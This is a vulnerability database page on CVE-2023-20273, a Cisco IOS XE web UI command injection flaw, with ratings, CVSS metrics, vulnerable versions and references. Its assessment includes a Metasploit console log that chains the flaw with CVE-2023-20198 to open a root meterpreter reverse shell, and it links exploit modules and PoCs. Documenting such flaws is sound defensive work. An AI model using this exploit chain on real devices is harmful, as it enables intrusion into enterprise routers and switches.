CVE-2023-20273

Description

A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating system with root privileges.

Add Assessment

sfewer-r7 (81)

November 10, 2023 10:08am UTC (5 months ago)•Edited 5 months ago

Ratings

Attacker Value

Very High

Exploitability

High

Technical Analysis

While this vulnerability requires authentication, it can be chained with CVE-2023-20198 to achieve unauthenticated RCE on the target, as shown via the Metasploit exploit:

msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'sqVXixoV' with password 'ZiPbsXBu'
[*] Removing user 'sqVXixoV'
[*] Sending stage (3045380 bytes) to 192.168.86.58
[*] Meterpreter session 6 opened (192.168.86.42:4444 -> 192.168.86.58:64970) at 2023-11-06 17:01:06 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : router
OS           :  (Linux 4.19.106)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

I have marked the exploitability for this vulnerability as High, as the vulnerable Web UI component may not be enabled by default. The attacker value for this vulnerability is Very High, given the target devices running IOS XE are enterprise routers/switches/access points.

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

7.2 High

Impact Score:

5.9

Exploitability Score:

1.2

Vector:

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

High

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

High

Availability (A):

High

General Information

Offensive Application

Unknown

Utility Class

Unknown

Ports

Unknown

Vulnerable Versions

Cisco IOS XE Software 16.1.1

Cisco IOS XE Software 16.1.2

Cisco IOS XE Software 16.1.3

Cisco IOS XE Software 16.2.1

Cisco IOS XE Software 16.2.2

Cisco IOS XE Software 16.3.1

Cisco IOS XE Software 16.3.2

Cisco IOS XE Software 16.3.3

Cisco IOS XE Software 16.3.1a

Cisco IOS XE Software 16.3.4

Cisco IOS XE Software 16.3.5

Cisco IOS XE Software 16.3.5b

Cisco IOS XE Software 16.3.6

Cisco IOS XE Software 16.3.7

Cisco IOS XE Software 16.3.8

Cisco IOS XE Software 16.3.9

Cisco IOS XE Software 16.3.10

Cisco IOS XE Software 16.3.11

Cisco IOS XE Software 16.4.1

Cisco IOS XE Software 16.4.2

Cisco IOS XE Software 16.4.3

Cisco IOS XE Software 16.5.1

Cisco IOS XE Software 16.5.1a

Cisco IOS XE Software 16.5.1b

Cisco IOS XE Software 16.5.2

Cisco IOS XE Software 16.5.3

Cisco IOS XE Software 16.6.1

Cisco IOS XE Software 16.6.2

Cisco IOS XE Software 16.6.3

Cisco IOS XE Software 16.6.4

Cisco IOS XE Software 16.6.5

Cisco IOS XE Software 16.6.4a

Cisco IOS XE Software 16.6.5a

Cisco IOS XE Software 16.6.6

Cisco IOS XE Software 16.6.7

Cisco IOS XE Software 16.6.8

Cisco IOS XE Software 16.6.9

Cisco IOS XE Software 16.6.10

Cisco IOS XE Software 16.7.1

Cisco IOS XE Software 16.7.1a

Cisco IOS XE Software 16.7.1b

Cisco IOS XE Software 16.7.2

Cisco IOS XE Software 16.7.3

Cisco IOS XE Software 16.7.4

Cisco IOS XE Software 16.8.1

Cisco IOS XE Software 16.8.1a

Cisco IOS XE Software 16.8.1b

Cisco IOS XE Software 16.8.1s

Cisco IOS XE Software 16.8.1c

Cisco IOS XE Software 16.8.1d

Cisco IOS XE Software 16.8.2

Cisco IOS XE Software 16.8.1e

Cisco IOS XE Software 16.8.3

Cisco IOS XE Software 16.9.1

Cisco IOS XE Software 16.9.2

Cisco IOS XE Software 16.9.1a

Cisco IOS XE Software 16.9.1b

Cisco IOS XE Software 16.9.1s

Cisco IOS XE Software 16.9.3

Cisco IOS XE Software 16.9.4

Cisco IOS XE Software 16.9.3a

Cisco IOS XE Software 16.9.5

Cisco IOS XE Software 16.9.5f

Cisco IOS XE Software 16.9.6

Cisco IOS XE Software 16.9.7

Cisco IOS XE Software 16.9.8

Cisco IOS XE Software 16.10.1

Cisco IOS XE Software 16.10.1a

Cisco IOS XE Software 16.10.1b

Cisco IOS XE Software 16.10.1s

Cisco IOS XE Software 16.10.1c

Cisco IOS XE Software 16.10.1e

Cisco IOS XE Software 16.10.1d

Cisco IOS XE Software 16.10.2

Cisco IOS XE Software 16.10.1f

Cisco IOS XE Software 16.10.1g

Cisco IOS XE Software 16.10.3

Cisco IOS XE Software 16.11.1

Cisco IOS XE Software 16.11.1a

Cisco IOS XE Software 16.11.1b

Cisco IOS XE Software 16.11.2

Cisco IOS XE Software 16.11.1s

Cisco IOS XE Software 16.12.1

Cisco IOS XE Software 16.12.1s

Cisco IOS XE Software 16.12.1a

Cisco IOS XE Software 16.12.1c

Cisco IOS XE Software 16.12.1w

Cisco IOS XE Software 16.12.2

Cisco IOS XE Software 16.12.1y

Cisco IOS XE Software 16.12.2a

Cisco IOS XE Software 16.12.3

Cisco IOS XE Software 16.12.8

Cisco IOS XE Software 16.12.2s

Cisco IOS XE Software 16.12.1x

Cisco IOS XE Software 16.12.1t

Cisco IOS XE Software 16.12.4

Cisco IOS XE Software 16.12.3s

Cisco IOS XE Software 16.12.3a

Cisco IOS XE Software 16.12.4a

Cisco IOS XE Software 16.12.5

Cisco IOS XE Software 16.12.6

Cisco IOS XE Software 16.12.1z1

Cisco IOS XE Software 16.12.5a

Cisco IOS XE Software 16.12.5b

Cisco IOS XE Software 16.12.1z2

Cisco IOS XE Software 16.12.6a

Cisco IOS XE Software 16.12.7

Cisco IOS XE Software 16.12.9

Cisco IOS XE Software 16.12.10

Cisco IOS XE Software 17.1.1

Cisco IOS XE Software 17.1.1a

Cisco IOS XE Software 17.1.1s

Cisco IOS XE Software 17.1.1t

Cisco IOS XE Software 17.1.3

Cisco IOS XE Software 17.2.1

Cisco IOS XE Software 17.2.1r

Cisco IOS XE Software 17.2.1a

Cisco IOS XE Software 17.2.1v

Cisco IOS XE Software 17.2.2

Cisco IOS XE Software 17.2.3

Cisco IOS XE Software 17.3.1

Cisco IOS XE Software 17.3.2

Cisco IOS XE Software 17.3.3

Cisco IOS XE Software 17.3.1a

Cisco IOS XE Software 17.3.1w

Cisco IOS XE Software 17.3.2a

Cisco IOS XE Software 17.3.1x

Cisco IOS XE Software 17.3.1z

Cisco IOS XE Software 17.3.4

Cisco IOS XE Software 17.3.5

Cisco IOS XE Software 17.3.4a

Cisco IOS XE Software 17.3.6

Cisco IOS XE Software 17.3.4b

Cisco IOS XE Software 17.3.4c

Cisco IOS XE Software 17.3.5a

Cisco IOS XE Software 17.3.5b

Cisco IOS XE Software 17.3.7

Cisco IOS XE Software 17.3.8

Cisco IOS XE Software 17.4.1

Cisco IOS XE Software 17.4.2

Cisco IOS XE Software 17.4.1a

Cisco IOS XE Software 17.4.1b

Cisco IOS XE Software 17.4.2a

Cisco IOS XE Software 17.5.1

Cisco IOS XE Software 17.5.1a

Cisco IOS XE Software 17.5.1b

Cisco IOS XE Software 17.5.1c

Cisco IOS XE Software 17.6.1

Cisco IOS XE Software 17.6.2

Cisco IOS XE Software 17.6.1w

Cisco IOS XE Software 17.6.1a

Cisco IOS XE Software 17.6.1x

Cisco IOS XE Software 17.6.3

Cisco IOS XE Software 17.6.1y

Cisco IOS XE Software 17.6.1z

Cisco IOS XE Software 17.6.3a

Cisco IOS XE Software 17.6.4

Cisco IOS XE Software 17.6.1z1

Cisco IOS XE Software 17.6.5

Cisco IOS XE Software 17.6.6

Cisco IOS XE Software 17.7.1

Cisco IOS XE Software 17.7.1a

Cisco IOS XE Software 17.7.1b

Cisco IOS XE Software 17.7.2

Cisco IOS XE Software 17.10.1

Cisco IOS XE Software 17.10.1a

Cisco IOS XE Software 17.10.1b

Cisco IOS XE Software 17.8.1

Cisco IOS XE Software 17.8.1a

Cisco IOS XE Software 17.9.1

Cisco IOS XE Software 17.9.1w

Cisco IOS XE Software 17.9.2

Cisco IOS XE Software 17.9.1a

Cisco IOS XE Software 17.9.1x

Cisco IOS XE Software 17.9.1y

Cisco IOS XE Software 17.9.3

Cisco IOS XE Software 17.9.2a

Cisco IOS XE Software 17.9.1x1

Cisco IOS XE Software 17.9.3a

Cisco IOS XE Software 17.9.4

Cisco IOS XE Software 17.9.1y1

Cisco IOS XE Software 17.11.1

Cisco IOS XE Software 17.11.1a

Cisco IOS XE Software 17.12.1

Cisco IOS XE Software 17.12.1a

Cisco IOS XE Software 17.11.99SW

Prerequisites

Unknown

Discovered By

Unknown

PoC Author

Unknown

Metasploit Module

Unknown

Reporter

Unknown

Vendors

cisco

Products

ios xe

Metasploit Modules

exploit/linux/misc/cisco_ios_xe_rce (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/cisco_ios_xe_rce.rb)

auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb)

Exploited in the Wild

Reported by:

inokii indicated sources as

Vendor Advisory (https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)
Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2023/10/23/cisa-adds-one-known-exploited-vulnerability-catalog)

Reported: October 24, 2023 10:26pm UTC (6 months ago) • Edited 6 months ago

References

Canonical

CVE-2023-20273 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20273)

Exploit

The following exploit POCs have not been verified by Rapid7 researchers, but are sourced from: nomi-sec/PoC-in-GitHub.
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.

PoC (https://github.com/smokeintheshell/CVE-2023-20273)

Miscellaneous

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z

http://packetstormsecurity.com/files/175674/Cisco-IOX-XE-Unauthenticated-Remote-Code-Execution.html

Rapid7

Very High

Very High

High

None

High

Network

CVE-2023-20273

Description

Add Assessment

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

Metasploit Modules

Exploited in the Wild

References

Canonical

Exploit

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification